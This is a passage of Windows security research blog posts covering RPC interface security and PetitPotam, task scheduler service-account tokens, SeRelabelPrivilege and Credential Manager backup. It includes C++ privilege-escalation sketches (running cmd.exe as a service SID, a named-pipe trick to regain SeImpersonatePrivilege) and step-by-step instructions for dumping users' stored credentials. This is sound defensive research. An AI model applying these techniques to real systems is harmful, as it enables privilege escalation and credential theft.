    The second parameter, IfCallback, takes an RPC_IF_CALLBACK function pointer. This callback function will be invoked when a call is made to the interface, although it will be called after the SD is checked. If the callback function returns RPC_S_OK then the call will be allowed, anything else will deny the call. The callback gets a pointer to the interface and the binding handle and can do various checks to determine if the caller is allowed to access the interface.

    A common check is for the client's authentication level. The client can specify the level to use when connecting to the server using the RpcBindingSetAuthInfo API however the server can't directly specify the minimum authentication level it accepts. Instead the callback can use the RpcBindingInqAuthClient API to determine what the client used and grant or deny access based on that. The authentication levels we typically care about are as follows:
    • RPC_C_AUTHN_LEVEL_NONE - No authentication
    • RPC_C_AUTHN_LEVEL_CONNECT - Authentication at connect time, but not per-call.
    • RPC_C_AUTHN_LEVEL_PKT_INTEGRITY - Authentication at connect time, each call has integrity protection.
    • RPC_C_AUTHN_LEVEL_PKT_PRIVACY - Authentication at connect time, each call is encrypted and has integrity protection.
    The authentication is implemented using a defined authentication service, such as NTLM or Kerberos, though that doesn't really matter for our purposes. Also note that this is only used for RPC services available over remote protocols such as named pipes or TCP. If the RPC server listens on ALPC then it's assumed to always be RPC_C_AUTHN_LEVEL_PKT_PRIVACY. Another check the server could do would be on the protocol sequence the client used; this would allow rejecting access via TCP but permitting named pipes.

    The final parameter is the flags. The flag most obviously related to security is RPC_IF_ALLOW_SECURE_ONLY (0x8). This blocks access to the interface if the current authentication level is RPC_C_AUTHN_LEVEL_NONE. This means the caller must be able to authenticate to the server using one of the permitted authentication services. It's not sufficient to use a NULL session, at least on any modern version of Windows. Of course this doesn't say much about who has authenticated, a server might still want to check the caller's identity.

    The other important flag is RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH (0x10). If the server specifies a security callback and this flag is not set then any unauthenticated client will be automatically rejected. 
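
    Putting these interface-level options together, here's a rough sketch of a registration with a security callback which requires at least packet integrity. Demo_v1_0_s_ifspec stands in for your MIDL-generated interface handle, and the exact checks are just for illustration:

    #include <windows.h>
    #include <rpc.h>

    #pragma comment(lib, "rpcrt4.lib")

    // Stand-in for the interface handle from the MIDL-generated stub.
    extern RPC_IF_HANDLE Demo_v1_0_s_ifspec;

    // Invoked on each call after any interface SD check. The context
    // can be used as the client's binding handle.
    RPC_STATUS CALLBACK SecurityCallback(RPC_IF_HANDLE /*Interface*/,
                                         void* Context) {
      unsigned long AuthnLevel = 0;
      unsigned long AuthnSvc = 0;
      if (RpcBindingInqAuthClient(Context, nullptr, nullptr, &AuthnLevel,
                                  &AuthnSvc, nullptr) != RPC_S_OK) {
        return RPC_S_ACCESS_DENIED;
      }
      // Reject anything weaker than packet integrity.
      if (AuthnLevel < RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
        return RPC_S_ACCESS_DENIED;
      return RPC_S_OK;
    }

    void RegisterInterface() {
      // As RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH is not set any
      // unauthenticated client is rejected before the callback runs.
      RpcServerRegisterIf3(
          Demo_v1_0_s_ifspec,
          nullptr,
          nullptr,
          RPC_IF_ALLOW_SECURE_ONLY,
          RPC_C_LISTEN_MAX_CALLS_DEFAULT,
          (unsigned int)-1,   // No maximum request size.
          SecurityCallback,
          nullptr);           // Could also pass an explicit SD here.
    }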

    If this wasn't complex enough there's at least one other related setting which applies system wide which will determine what type of clients can access what RPC server. The Restrict Unauthenticated RPC Clients group policy. By default this is set to None if the RPC server is running on a server SKU of Windows and Authenticated on a client SKU. 

    In general what this policy does is limit whether a client can use an unauthenticated transport such as TCP when they haven't also separately authenticated to a valid authentication level. When set to None RPC servers can be accessed via an unauthenticated transport subject to any other restrictions the interface is registered with. If set to Authenticated then calls over unauthenticated transports are rejected, unless the RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH flag is set for the interface or the client has authenticated separately. There's a third option, Authenticated without exceptions, which will block the call in all circumstances if the caller isn't using an authenticated transport. 

    Ad-hoc Security

    The final types of checks are basically anything else the server does to verify the caller. A common approach would be to perform a check within a specific function on the interface. For example, a server could generally allow unauthenticated clients, except when calling a method to read an important secret value. At that point it could insert an authentication level check to ensure the client has authenticated at RPC_C_AUTHN_LEVEL_PKT_PRIVACY so that the secret will be encrypted when returned to the client. 

    Ultimately you'll have to check each function you're interested in to determine what, if any, security checks are in place. As with all ad-hoc checks it's possible that there's a logic bug in there which can be exploited to bypass the security restrictions.

    Digging into EFSRPC

    Okay, that covers the basics of how an RPC server is secured. Let's look at the specific example of the EFSRPC server abused by PetitPotam. Oddly there's two implementations of the RPC server, one in efslsaext.dll with the interface UUID of c681d488-d850-11d0-8c52-00c04fd90f7e and one in efssvc.dll with the interface UUID of df1941c5-fe89-4e79-bf10-463657acf44d. The one in efslsaext.dll is the one which is accessible unauthenticated, so let's start there. We'll go through the three approaches to securing the server to determine what it's doing.

    First, the server does not register any of its own protocol sequences, with SDs or not. What this means is who can call the RPC server is dependent on what other endpoints have been registered by the hosting process, which in this case is LSASS.

    Second, checking for calls to one of the RPC server interface registration functions, there's a single call to RpcServerRegisterIfEx in InitializeLsaExtension. This allows the caller to specify the security callback but not an SD. However in this case it doesn't specify any security callback. The InitializeLsaExtension function also does not specify either of the two security flags (it sets RPC_IF_AUTOLISTEN which doesn't have any security impact). This means that in general any authenticated caller is permitted.

    Finally, from an ad-hoc security perspective all the main functions such as EfsRpcOpenFileRaw call the function EfsRpcpValidateClientCall which looks something like the following (error check removed).

    void EfsRpcpValidateClientCall(RPC_BINDING_HANDLE Binding, 
                                   PBOOL ValidClient) {
      unsigned int ClientLocalFlag;
      I_RpcBindingIsClientLocal(NULL, &ClientLocalFlag);
      if (!ClientLocalFlag) {
        RPC_WSTR StringBinding;
        RPC_WSTR Protseq;
        RpcBindingToStringBindingW(Binding, &StringBinding);
        RpcStringBindingParseW(StringBinding, NULL, &Protseq, 
                               NULL, NULL, NULL);
        if (CompareStringW(LOCALE_INVARIANT, NORM_IGNORECASE, 
            Protseq, -1, L"ncacn_np", -1) == CSTR_EQUAL) {
          *ValidClient = TRUE;
        }
      }
    }

    Basically the ValidClient parameter will only be set to TRUE if the caller used the named pipe transport and the pipe wasn't opened locally, i.e. the named pipe was opened over SMB. This is basically all the security that's being checked for. Therefore the only security that could be enforced is limited by who's allowed to connect to a suitable named pipe endpoint.

    At a minimum LSASS registers the \pipe\lsass named pipe endpoint. When it's setup in lsasrv.dll a SD is defined for the named pipe that grants the following users access:
    • Everyone
    • NT AUTHORITY\ANONYMOUS LOGON
    • BUILTIN\Administrators
    Therefore in theory the anonymous user has access to the pipe, and there are no other security checks in place in the interface registration. Now typically anonymous access isn't granted by default to named pipes via a NULL session, however domain controllers have an exception to this policy through the configured Network access: Named Pipes that can be accessed anonymously security option. For DCs this allows lsarpc, samr and netlogon pipes, which are all aliases for the lsass pipe, to be accessed anonymously.

    You can now understand why the EFS RPC server is accessible anonymously on DCs. How does the other EFS RPC server block access? In that case it specifies an interface SD to limit access to only the Everyone group and BUILTIN\Administrators. By default the anonymous user isn't a member of Everyone (although it can be configured as such) therefore this blocks access even if you connected via the lsass pipe.

    The Fix is In

    What did Microsoft do to fix PetitPotam? One thing they definitely didn't do is change the interface registration or the named pipe endpoint security. Instead they added an additional ad-hoc check to EfsRpcOpenFileRaw. Specifically they added the following code:

    DWORD AllowOpenRawDL = 0;
    RegGetValueW(
      HKEY_LOCAL_MACHINE,
      L"SYSTEM\\CurrentControlSet\\Services\\EFS",
      L"AllowOpenRawDL",
      RRF_RT_REG_DWORD | RRF_ZEROONFAILURE,
      NULL,
      &AllowOpenRawDL);
    EfsRpcpValidateClientCall(hBinding, &ValidClient);  // Error checking removed as before.
    if (AllowOpenRawDL == 1 && ValidClient) {
      // Call allowed.
    }

    Basically, unless the AllowOpenRawDL registry value is set to one the call is blocked entirely regardless of the authenticating client. This seems to be a perfectly valid fix, except that EfsRpcOpenFileRaw isn't the only function usable to start an NTLM authentication session. As pointed out by Lee Christensen you can also do it via EfsRpcEncryptFileSrv or EfsRpcQueryUsersOnFile or others. Therefore as no other changes were put in place these other functions are accessible just as unauthenticated as the original.

    It's really unclear how Microsoft didn't see this, but I guess they might have been blinded by actually fixing something which they were adamant was a configuration issue that sysadmins had to deal with. 

    UPDATE 2021/08/17: It's worth noting that while you can access the other functions unauthenticated it seems any network access is done using the "authenticated" caller, i.e. the ANONYMOUS user so it's probably not that useful. The point of this blog is not about abusing EFSRPC but why it's abusable :-)

    Anyway I hope that explains why PetitPotam works unauthenticated (props to topotam77 for the find) and might give you some insight into how you can determine what RPC servers might be accessible going forward. 

    A Little More on the Task Scheduler's Service Account Usage

    By: tiraniddo
    12 June 2021 at 05:42

    Recently I was playing around with a service which was running under a full virtual service account rather than LOCAL SERVICE or NETWORK SERVICE, but it had SeImpersonatePrivilege removed. Looking for a solution I recalled that Andrea Pierini had posted a blog about using virtual service accounts, so I thought I'd look there for inspiration. One thing which was interesting is that he mentioned that a technique abusing the task scheduler found by Clément Labro, which worked for LS or NS, didn't work when using virtual service accounts. I thought I should investigate it further, out of curiosity, and in the process I found an sneaky technique you can use for other purposes.

    I've already blogged about the task scheduler's use of service accounts. Specifically in a previous blog post I discussed how you could get the TrustedInstaller group by running a scheduled task using the service SID. As the service SID is the same name as used when you are using a virtual service account it's clear that the problem lies in the way this functionality is implemented and that it's likely distinct from how LS or NS tokens are created.

    The core process creation code for the task scheduler in Windows 10 is actually in the Unified Background Process Manager (UBPM) DLL, rather than in the task scheduler itself. A quick look at that DLL we find the following code:

    HANDLE UbpmpTokenGetNonInteractiveToken(PSID PrincipalSid) {
      // ...
      if (UbpmUtilsIsServiceSid(PrincipalSid)) {
        return UbpmpTokenGetServiceAccountToken(PrincipalSid);
      }

      if (EqualSid(PrincipalSid, kNetworkService)) {
        Domain = L"NT AUTHORITY";
        User = L"NetworkService";
      } else if (EqualSid(PrincipalSid, kLocalService)) {
        Domain = L"NT AUTHORITY";
        User = L"LocalService";
      }

      HANDLE Token;
      if (LogonUserExExW(User, Domain, Password, 
          LOGON32_LOGON_SERVICE, 
          LOGON32_PROVIDER_DEFAULT, &Token)) {
        return Token;
      }
      // ...
    }


    The UbpmpTokenGetNonInteractiveToken function takes the principal SID from the task registration (or the one passed to RunEx) and determines what it represents to get back the token. It checks if the SID is a service SID, by which it means the NT SERVICE\NAME SID we used in the previous blog post. If it is it calls a separate function, UbpmpTokenGetServiceAccountToken, to get the service token.

    Otherwise if the SID is NS or LS then it specifies the well-known names for those SIDs and calls LogonUserExEx with the LOGON32_LOGON_SERVICE type. The UbpmpTokenGetServiceAccountToken function does the following:

    HANDLE UbpmpTokenGetServiceAccountToken(PSID PrincipalSid) {
      LPCWSTR Name = UbpmUtilsGetAccountNamesFromSid(PrincipalSid);
      SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);
      SC_HANDLE service = OpenService(scm, Name, SERVICE_ALL_ACCESS);
      HANDLE Token;
      GetServiceProcessToken(g_ScheduleServiceHandle, service, &Token);
      return Token;
    }

    This function gets the name from the service SID, which is the name of the service itself and opens it for all access rights (SERVICE_ALL_ACCESS). If that succeeds then it passes the service handle to an undocumented SCM API, GetServiceProcessToken, which returns the token for the service. Looking at the implementation in SCM this basically uses the exact same code as it would use for creating the token for starting the service. 

    This is why there's a distinction between LS/NS and a virtual service account using Clément's technique. If you use LS/NS the task scheduler gets a fresh token from the LSA with no regard to how the service is configured. Therefore the new token has SeImpersonatePrivilege (or whatever else is allowed). However for a virtual service account the service asks the SCM for the service's token, and as the SCM knows about what restrictions are in place it honours things like privileges or the SID type. Therefore the returned token will be stripped of SeImpersonatePrivilege again even though it'll technically be a different token to the one the service is currently running with. 

    Why does the task scheduler need some undocumented function to get the service token? As I mentioned in a previous blog post about virtual accounts only the SCM (well technically the first process to claim it's the SCM) is allowed to authenticate a token with a virtual service account. This seems kind of pointless if you ask me as you already need SeTcbPrivilege to create the service token, but it is what it is.

    Okay, so now we know why Clément's technique doesn't get you back any privileges. You might now be asking, so what? Well one interesting behavior came from looking at how the task scheduler determines if you're allowed to specify a service SID as a principal. In my blog post on creating a task running as TrustedInstaller I implied it needed administrator access, which is sort of true and sort of not. Let's see the function the task scheduler uses to determine if the caller's allowed to run a task as a specified principal.

    BOOL IsPrincipalAllowed(User& principal) {
      RpcAutoImpersonate::RpcAutoImpersonate();
      User caller;
      User::FromImpersonationToken(&caller);
      RpcRevertToSelf();
      if (tsched::IsUserAdmin(caller) || 
          caller.IsLocalSystem(caller)) {
        return TRUE;
      }

      if (principal == caller) {
        return TRUE;
      }

      if (principal.IsServiceSid()) {
        LPCWSTR Name = principal.GetAccount();
        RpcAutoImpersonate::RpcAutoImpersonate();
        SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);
        SC_HANDLE service = OpenService(scm, Name, SERVICE_ALL_ACCESS);
        RpcRevertToSelf();
        if (service) {
          return TRUE;
        }
      }
      return FALSE;
    }

    The IsPrincipalAllowed function first checks if the caller is an administrator or SYSTEM. If it is then any principal is allowed (again not completely true, but good enough). Next it checks if the principal's user SID matches the one we're setting. This is what would allow NS/LS or a virtual service account to specify a task running as their own user account. 

    Finally, if the principal is a service SID, then it tries to open the service for full access while impersonating the caller. If that succeeds it allows the service SID to be used as a principal. This behaviour is interesting as it allows for a sneaky way to abuse badly configured services. 

    It's a well-known check for privilege escalation that you enumerate all local services and see if any of them grant a normal user privileged access rights, mainly SERVICE_CHANGE_CONFIG. This is enough to hijack the service and get arbitrary code running as the service account. A common trick is to change the executable path and restart the service, but this isn't great for a few different reasons.

    1. Changing the executable path could easily be noticed.
    2. You probably want to fix the path back again afterwards, which is just a pain.
    3. If the service is currently running you'll need to stop the service, then restart the modified service to get the code execution.
    However, as long as your account is granted full access to the service you can use the task scheduler even without being an administrator to get code running as the service's user account, such as SYSTEM, without ever needing to modify the service's configuration directly or stop/start the service. Much more sneaky. Of course this does mean that the token the task runs under might have privileges stripped etc, but that's something which is easy enough to deal with (as long as it's not write restricted).
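
    To illustrate, here's a rough sketch using the Task Scheduler COM API to register and run a task as a service SID. FooService, the task name and the command line are all made up for the example, this assumes the service grants you SERVICE_ALL_ACCESS, and the registration details might need tweaking:

    #include <windows.h>
    #include <taskschd.h>
    #include <atlbase.h>

    #pragma comment(lib, "taskschd.lib")
    #pragma comment(lib, "ole32.lib")
    #pragma comment(lib, "oleaut32.lib")

    int main() {
      CoInitializeEx(nullptr, COINIT_MULTITHREADED);
      CComPtr<ITaskService> service;
      if (FAILED(service.CoCreateInstance(CLSID_TaskScheduler)))
        return 1;
      if (FAILED(service->Connect(CComVariant(), CComVariant(),
                                  CComVariant(), CComVariant())))
        return 1;

      CComPtr<ITaskFolder> folder;
      if (FAILED(service->GetFolder(CComBSTR(L"\\"), &folder)))
        return 1;

      // Task XML with the principal set to the hypothetical FooService
      // service SID. The command is just for demonstration.
      CComBSTR xml(LR"(<?xml version="1.0"?>
    <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
      <Principals>
        <Principal id="Author">
          <UserId>NT SERVICE\FooService</UserId>
        </Principal>
      </Principals>
      <Actions Context="Author">
        <Exec><Command>C:\Windows\System32\cmd.exe</Command></Exec>
      </Actions>
    </Task>)");

      // As a non-admin this only succeeds if opening FooService for
      // SERVICE_ALL_ACCESS succeeds while impersonating us.
      CComPtr<IRegisteredTask> task;
      HRESULT hr = folder->RegisterTask(CComBSTR(L"Demo"), xml,
          TASK_CREATE_OR_UPDATE, CComVariant(), CComVariant(),
          TASK_LOGON_SERVICE_ACCOUNT, CComVariant(), &task);
      if (FAILED(hr))
        return 1;

      CComPtr<IRunningTask> running;
      task->Run(CComVariant(), &running);
      return 0;
    }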

    This is a good lesson on how to never take things on face value. I just assumed the caller would need administrator privileges to set the service account as the principal for a task. But it seems that's not actually required if you dig into the code. Hopefully someone will find it useful.

    Footnote: If you read this far, you might also ask, can you get back SeImpersonatePrivilege from a virtual service account or not? Of course, you just use the named pipe trick I described in a previous blog post. Because of the way that the token is created the token stored in the logon session will still have all the assigned privileges. You can extract the token by using the named pipe to your own service, and use that to create a new process and get back all the missing privileges.
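
    A very rough sketch of that trick, assuming a service context where the loopback behavior applies (the pipe name is arbitrary and error handling is omitted):

    #include <windows.h>

    int main() {
      // Create the server end of the pipe inside our privilege-stripped
      // service process.
      HANDLE pipe = CreateNamedPipeW(L"\\\\.\\pipe\\demo_pipe",
          PIPE_ACCESS_DUPLEX, PIPE_TYPE_BYTE | PIPE_WAIT, 1, 0, 0, 0,
          nullptr);

      // Connect back over localhost SMB rather than \\.\pipe so a fresh
      // token is created from the logon session, privileges intact.
      HANDLE client = CreateFileW(L"\\\\localhost\\pipe\\demo_pipe",
          GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0,
          nullptr);

      // The client already connected, so this fails with
      // ERROR_PIPE_CONNECTED which is fine.
      ConnectNamedPipe(pipe, nullptr);

      // The server must read some data before it can impersonate.
      char buf = 0;
      DWORD bytes = 0;
      WriteFile(client, &buf, 1, &bytes, nullptr);
      ReadFile(pipe, &buf, 1, &bytes, nullptr);

      HANDLE token = nullptr;
      if (ImpersonateNamedPipeClient(pipe) &&
          OpenThreadToken(GetCurrentThread(),
                          TOKEN_DUPLICATE | TOKEN_QUERY, TRUE, &token)) {
        // 'token' comes from the shared logon session and should still
        // have the privileges. Duplicate it to a primary token and use
        // it to spawn a new, unstripped process.
        HANDLE primary = nullptr;
        DuplicateTokenEx(token, TOKEN_ALL_ACCESS, nullptr,
                         SecurityImpersonation, TokenPrimary, &primary);
      }
      RevertToSelf();
      return 0;
    }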

    The Much Misunderstood SeRelabelPrivilege

    By: tiraniddo
    2 June 2021 at 21:49

    Based on my previous blog post I recently had a conversation with a friend and well-known Windows security researcher about token privileges. Specifically, I was musing on how SeTrustedCredmanAccessPrivilege is not a "God" privilege. After some back and forth it seemed we were talking at cross purposes. My concept of a "God" privilege is one which the kernel considers to make a token elevated (see Reading Your Way Around UAC (Part 3)) and so doesn't make it available to any token with an integrity level less than High. They on the other hand consider such a privilege to be one where you can directly compromise a resource or the OS as a whole by having the privilege enabled, this might include privileges which aren't strictly a "God" from the kernel's perspective but can still allow system compromise.

    After realizing the misunderstanding I was still surprised that one of the privileges in their list wasn't considered a "God", specifically SeRelabelPrivilege. It seems that there's perhaps some confusion as to what this privilege actually allows you to do, so I thought it'd be worth clearing it up.

    Point of pedantry: I don't believe it's correct to say that a resource has an integrity level. It instead has a mandatory label, which is stored in an ACE in the SACL. That ACE contains a SID which maps to an integrity level and a mandatory policy which is stored in the access mask. The combination of integrity level and policy is what determines what access is granted (although you can't grant write up through the policy). The token on the other hand does have an integrity level and a separate mandatory policy, which isn't the same as the one in the ACE. Oddly you specify the value when calling SetTokenInformation using a TOKEN_MANDATORY_LABEL structure, confusing I know.

    As with a lot of privileges which don't get used very often the official documentation is not great. You can find the MSDN documentation here. The page is worse than usual as it seems to have been written at a time in the Vista/Longhorn development when the Mandatory Integrity Control (MIC) (or as it calls it Windows Integrity Control (WIC)) feature was still in flux. For example, it mentions an integrity level above System, called Installer. Presumably Installer was the initial idea to block administrators modifying system files, which was replaced by the TrustedInstaller SID as the owner (see previous blog posts). There is a level above System in Vista, called Protected Process, which is not usable as protected processes were implemented using a different mechanism. 

    Distilling what the documentation says the privilege does, it allows for two operations. First it allows you to set the integrity level in a mandatory label ACE to be above the caller's token integrity level. Normally as long as you've been granted WRITE_OWNER access to a resource you can set the label's integrity level to any value less than or equal to the caller's integrity level.

    For example, if you try to set the resource's label to System, but the caller is only at High then the operation fails with the STATUS_INVALID_LABEL error. If you enable SeRelabelPrivilege then this operation will succeed. 
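
    To make that concrete, here's a sketch of setting a System integrity label on a kernel object via the Win32 APIs. The handle needs WRITE_OWNER access, the helper name RaiseLabelToSystem is made up, and I'm assuming SeRelabelPrivilege has already been enabled on the caller's token:

    #include <windows.h>
    #include <sddl.h>
    #include <aclapi.h>

    #pragma comment(lib, "advapi32.lib")

    bool RaiseLabelToSystem(HANDLE handle) {
      // Build a SACL containing a System integrity mandatory label ACE.
      PSECURITY_DESCRIPTOR sd = nullptr;
      if (!ConvertStringSecurityDescriptorToSecurityDescriptorW(
          L"S:(ML;;NW;;;SI)", SDDL_REVISION_1, &sd, nullptr)) {
        return false;
      }
      BOOL present = FALSE;
      BOOL defaulted = FALSE;
      PACL sacl = nullptr;
      GetSecurityDescriptorSacl(sd, &present, &sacl, &defaulted);

      // Without SeRelabelPrivilege enabled this fails with
      // ERROR_INVALID_LABEL (STATUS_INVALID_LABEL at the native layer)
      // if the caller's integrity level is below System.
      DWORD err = SetSecurityInfo(handle, SE_KERNEL_OBJECT,
          LABEL_SECURITY_INFORMATION, nullptr, nullptr, nullptr, sacl);
      LocalFree(sd);
      return err == ERROR_SUCCESS;
    }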

    Note, the privilege doesn't allow you to raise the integrity level of a token, you need SeTcbPrivilege for that. You can't even raise the integrity level to be less than or equal to the caller's integrity level, the operation can only decrease the level in the token without SeTcbPrivilege.

    The second operation is that you can decrease the label. In general you can always decrease the label without the privilege, unless the resource's label is above the caller's. For example you can set the label to Low without any special privilege, as long as you have WRITE_OWNER access on the handle and the current label is less than or equal to the caller's. However, if the label is System and the caller is High then they can't decrease the label and the privilege is required.

    The documentation has this to say (emphasis mine):

    "If malicious software is set with an elevated integrity level such as Trusted Installer or System, administrator accounts do not have sufficient integrity levels to delete the program from the system. In that case, use of the Modify an object label right is mandated so that the object can be relabeled. However, the relabeling must occur by using a process that is at the same or a higher level of integrity than the object that you are attempting to relabel."

    This is a very confused paragraph. First it indicates that an administrator can't delete a resource with a Trusted Installer or System integrity label and so requires the privilege to relabel it. And then it says that the process doing the relabeling must be at a greater or equal integrity level to the object, in which case you wouldn't need the privilege at all. Perhaps the original design of mandatory labels was more sticky, as in maybe you always needed SeRelabelPrivilege to reduce the label regardless of its current value?

    At any rate the only user that gets SeRelabelPrivilege by default is SYSTEM, which defaults to the System integrity level which is already the maximum allowed level, so this behavior of the privilege seems pretty much moot. And as it's a "God" privilege it will be disabled if the token has an integrity level less than High, so this lowering operation is going to be rarely useful.

    This leads in to the most misunderstood part which if you squint you might be able to grasp from the privilege's documentation. The ability to lower the label of a resource is mostly dependent on whether the caller can get WRITE_OWNER access to the resource. However, the WRITE_OWNER access right is typically part of GENERIC_ALL in the generic mapping, which means it will never be granted to a caller with a lower integrity level regardless of the DACL or whether they're the owner. 

    This is the interesting thing the privilege brings to the lowering operation, it allows the caller to circumvent the MIC check for WRITE_OWNER. This then allows the caller to open for WRITE_OWNER a higher labeled resource and then change the label to any level it likes. This works the same way as SeTakeOwnershipPrivilege, in that it grants WRITE_OWNER without ever checking the DACL. However, if you use SeTakeOwnershipPrivilege it'll still be subject to the MIC check and will not grant access if the label is above the caller's integrity level.

    The problem with this privilege is down to the design of MIC, specifically that WRITE_OWNER is overloaded to allow setting the resource's mandatory label but also its traditional use of setting the owner. There's no way for the kernel to distinguish between the two operations once the access has been granted (or at least it doesn't try to distinguish). 

    Surely, there is some limitation on what type of resource can be granted WRITE_OWNER access? Nope, it seems that even if the caller does not have any access rights to the resource it will still be granted WRITE_OWNER access. This makes SeRelabelPrivilege exactly like SeTakeOwnershipPrivilege but with the added feature of circumventing the MIC check. Summarizing, a token with SeRelabelPrivilege enabled can take ownership of any resource it likes, even one which has a higher label than the caller.

    You can of course verify this yourself, here's some PowerShell script using NtObjectManager which you should run as an administrator. The script creates a security descriptor which doesn't grant SYSTEM any access, then tries to request WRITE_OWNER without and with SeRelabelPrivilege.

    PS> $sd = New-NtSecurityDescriptor "O:ANG:AND:(A;;GA;;;AN)" -Type Directory
    PS> Invoke-NtToken -System {
       Get-NtGrantedAccess -SecurityDescriptor $sd -Access WriteOwner -PassResult
    }
    Status               Granted Access Privileges
    ------               -------------- ----------
    STATUS_ACCESS_DENIED 0              NONE

    PS> Invoke-NtToken -System {
       Enable-NtTokenPrivilege SeRelabelPrivilege
       Get-NtGrantedAccess -SecurityDescriptor $sd -Access WriteOwner -PassResult
    }
    Status         Granted Access Privileges
    ------         -------------- ----------
    STATUS_SUCCESS WriteOwner     SeRelabelPrivilege

    The fact that this behavior is never made explicit is probably why my friend didn't realize it before. This, coupled with the privilege's rare usage (it's only granted by default to SYSTEM), means it's not really a problem in any meaningful sense. It would be interesting to know the design choices which led to the privilege being created, it seems like its role was significantly more important at some point and became almost vestigial during the Vista development process. 

    If you've read this far is there any actual useful scenario for this privilege? The only resources which typically have elevated labels are processes and threads. You can already circumvent the MIC check using SeDebugPrivilege. Of course usage of that privilege is probably watched like a hawk, so you could abuse this privilege instead to get full access to an elevated process, by changing the owner to the caller and lowering the label. Once you're the owner with a low label you can then modify the DACL to grant full access directly without SeDebugPrivilege.

    However, as only SYSTEM gets the privilege by default you'd need to impersonate the token, which would probably just allow you to access the process anyway. So it's mostly a useless quirk unless the system you're looking at has granted it to the service accounts, which might then open the door slightly to escaping to SYSTEM.

    Dumping Stored Credentials with SeTrustedCredmanAccessPrivilege

    By: tiraniddo
    21 May 2021 at 07:03

    I've been going through the various token privileges on Windows trying to find where they're used. One which looked interesting is SeTrustedCredmanAccessPrivilege which is documented as "Access Credential Manager as a trusted caller". The Credential Manager allows a user to store credentials, such as web or domain accounts in a central location that only they can access. It's protected using DPAPI so in theory it's only accessible when the user has authenticated to the system. The question is, what does having SeTrustedCredmanAccessPrivilege grant? I couldn't immediately find anyone who'd bothered to document it, so I guess I'll have to do it myself.

    The Credential Manager is one of those features that probably sounded great in the design stage, but does introduce security risks, especially if it's used to store privileged domain credentials, such as for remote desktop access. An application, such as the remote desktop client, can store domain credential using the CredWrite API and specifying the username and password in the CREDENTIAL structure. The type of credentials should be set to CRED_TYPE_DOMAIN_PASSWORD.

    An application can then access the stored credentials for the current user using APIs such as CredRead or CredEnumerate. However, if the type of credential is CRED_TYPE_DOMAIN_PASSWORD the CredentialBlob field which should contain the password is always empty. This is an artificial restriction put in place by LSASS which implements the credential manager RPC service. If a domain credentials type is being read then it will never return the password.

    How do the domain credentials get used if you can't read the password? Security packages such as NTLM/Kerberos/TSSSP which are running within the LSASS process can use an internal API which doesn't restrict the reading of the domain password. Therefore, when you authenticate to the remote desktop service the target name is used to lookup available credentials, and if they exist the user will be automatically authenticated.

    The credentials are stored in files in the user's profile encrypted with the user's DPAPI key. Why can we not just decrypt the file directly to get the password? When writing the file LSASS sets a system flag in the encrypted blob which makes the DPAPI refuse to decrypt the blob even though it's still under a user's key. Only code running in LSASS can call the DPAPI to decrypt the blob.

    If we have administrator privileges getting access to the password is trivial. Read the Mimikatz wiki page to understand the various ways that you can use the tool to get access to the credentials. However, it boils down to one of the following approaches:

    1. Patch out the checks in LSASS to not blank the password when read from a normal user.
    2. Inject code into LSASS to decrypt the file or read the credentials.
    3. Just read them from LSASS's memory.
    4. Reimplement DPAPI with knowledge of the user's password to ignore the system flag.
    5. Play games with the domain key backup protocol.
    For example, Nirsoft's CredentialsFileView seems to use the injection into LSASS technique to decrypt the DPAPI protected credential files. (Caveat, I've only looked at v1.07 as v1.10 seems to not be available for download anymore, so maybe it's now different. UPDATE: it seems available for download again but Defender thinks it's malware, plus ça change).

    At this point you can probably guess that SeTrustedCredmanAccessPrivilege allows a caller to get access to a user's credentials. But how exactly? Looking at LSASRV.DLL which contains the implementation of the Credential Manager the privilege is checked in the function CredpIsRpcClientTrusted. This is only called by two APIs, CredrReadByTokenHandle and CredrBackupCredentials which are exported through the CredReadByTokenHandle and CredBackupCredentials APIs.

    The CredReadByTokenHandle API isn't that interesting, it's basically CredRead but allows the user whose credentials to read to be specified by providing their token. As far as I can tell reading a domain credential still returns a blank password. CredBackupCredentials on the other hand is interesting. It's the API used by CREDWIZ.EXE to backup a user's credentials, which can then be restored at a later time. This backup includes all credentials including domain credentials. The prototype for the API is as follows:

    BOOL WINAPI CredBackupCredentials(HANDLE Token, 
                                      LPCWSTR Path, 
                                      PVOID Password, 
                                      DWORD PasswordSize, 
                                      DWORD Flags);

    The backup process is slightly convoluted, first you run CREDWIZ on your desktop and select backup and specify the file you want to write the backup to. When you continue with the backup the process makes an RPC call to your WinLogon process with the credentials path which spawns a new copy of CREDWIZ on the secure desktop. At this point you're instructed to use CTRL+ALT+DEL to switch to the secure desktop. Here you type the password, which is used to encrypt the file to protect it at rest, and is needed when the credentials are restored. CREDWIZ will even ensure it meets your system's password policy for complexity, how generous.

    CREDWIZ first stores the backup to a temporary file, as LSASS additionally encrypts the contents with the system DPAPI key. The file can then be decrypted and written to the final destination, with appropriate impersonation etc.

    The only requirement for calling this API is having the SeTrustedCredmanAccessPrivilege privilege enabled. Assuming we're an administrator getting this privilege is easy as we can just borrow a token from another process. For example, checking for what processes have the privilege shows obviously WinLogon but also LSASS itself even though it arguably doesn't need it.

    PS> $ts = Get-AccessibleToken
    PS> $ts | ? { 
       "SeTrustedCredmanAccessPrivilege" -in $_.ProcessTokenInfo.Privileges.Name 
    }
    TokenId Access                                  Name
    ------- ------                                  ----
    1A41253 GenericExecute|GenericRead    LsaIso.exe:124
    1A41253 GenericExecute|GenericRead     lsass.exe:672
    1A41253 GenericExecute|GenericRead winlogon.exe:1052
    1A41253 GenericExecute|GenericRead atieclxx.exe:4364

    I've literally no idea what the ATIECLXX.EXE process is doing with SeTrustedCredmanAccessPrivilege, it's probably best not to ask ;-)

    To use this API to backup a user's credentials as an administrator you do the following. 
    1. Open a WinLogon process for PROCESS_QUERY_LIMITED_INFORMATION access and get a handle to its token with TOKEN_DUPLICATE access.
    2. Duplicate token into an impersonation token, then enable SeTrustedCredmanAccessPrivilege.
    3. Open a token to the target user, who must already be authenticated.
    4. Call CredBackupCredentials while impersonating the WinLogon token passing a path to write to and a NULL password to disable the user encryption (just to make life easier). It's CREDWIZ which enforces the password policy not the API.
